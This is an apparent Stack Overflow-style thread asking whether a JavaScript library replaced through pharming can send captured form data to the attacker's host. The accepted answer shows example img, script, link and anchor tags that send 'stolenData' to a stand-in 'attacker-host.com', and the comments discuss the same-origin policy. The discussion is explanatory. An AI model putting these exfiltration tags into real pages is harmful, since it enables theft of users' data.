# An emulated jQuery or MooTools library (in ex.by pharming) can capture and send data to an external site?

Tags: javascript, jquery, mootools, security

There is a new fashion in calling jQuery, YUI, MooTools frameworks (and a lot of plugins too) from an external base site in order to be working with the latest builds.

In a pharming attack (just to mention one) the original library can be replaced by one infected in order to use it to manipulate the behavior of the library, the browser or the plug-ins. It's easy to capture form data, querystrings and other info using those libraries. It's easy to send it too.

So my question is:

Can the attacker also send this captured data to the same pharming emulated host from which has obtained the fake library?

There's a cross site JavaScript policy in the browser but is valid in this case? Remember that the fake library would be loaded from the same emulated host, and would also from the infected page, so there's no call to cross site DOM objects or functions.

Thanks a lot!

Comment: If I'm getting your question right: using img/script/link tags, data can be sent cross domain back to the emulated host. There are limitations to the amount of data that can be sent tho. Could you clarify your question a bit more, please?

Comment: Google analytics is an example that the info can be sent (URL, querystring, dom ojects access) I believe that the Cross site policy do not permit to take info from objects or functions in one page from a page in different domain or sub-domain, but this info is taken from the same page that calls the js library. Am I wrong?

Comment: interesting idea. my advice: use your own cdn or pseudo cdn-like domain - not likely to get hijacked as a part of a generic attack that would target popular cdn hosts like amazons3 or google.

Answer (score 1, accepted):

well, you should think about the ways javascript can transmit data to another site :
-ajax
-frames
-attaching external URL to dom objects
-webSockets

In the first two cases, although there are some hacks, because of the [same origin policy](http://en.wikipedia.org/wiki/Same_origin_policy), it is not possible to transmit data from a site to another hosted on a different (sub)domain or another using a different protocol.Even if the host is "poisoned" by "pharming", it doesn't mean that it will point to the same domain.
It is very easy to simply acces an external URL and send any GET data to it, simply by attaching that URL to a dom element that requires one :

`<a href="http://attacker-host.com/?stolenData=stolenData"></a>
<img src="http://attacker-host.com/?stolenData=stolenData" />
<script src="http://attacker-host.com/?stolenData=stolenData"></script>
<link href="http://attacker-host.com/?stolenData=stolenData" />
//... and so on`
 
If the attacker implements a webSocket data transmitter and if you use a modern browser, the data exchange might work.

In conclusion, it can be done, although it would a bit unlikely to sabotage a DNS and to modify js libs in a way that the user could not tell.

EDIT: added the simplest solution : dom objects

Comment: One can always use a script/img/link tag to make a request that is not restricted by the same origin policy. As I've mentioned above, the only limiting factor is the size of the data being sent since data would have to be attached to the URL of the script/img/link tag.

Comment: @Lior Cohen: So it is possible!
@gion_13: Google analytics is an example that the info can be sent (URL, querystring, dom ojects access) Am I wrong?

Comment: you guys are right... i've totally forgot about accesing an external url through an ordinary dom obj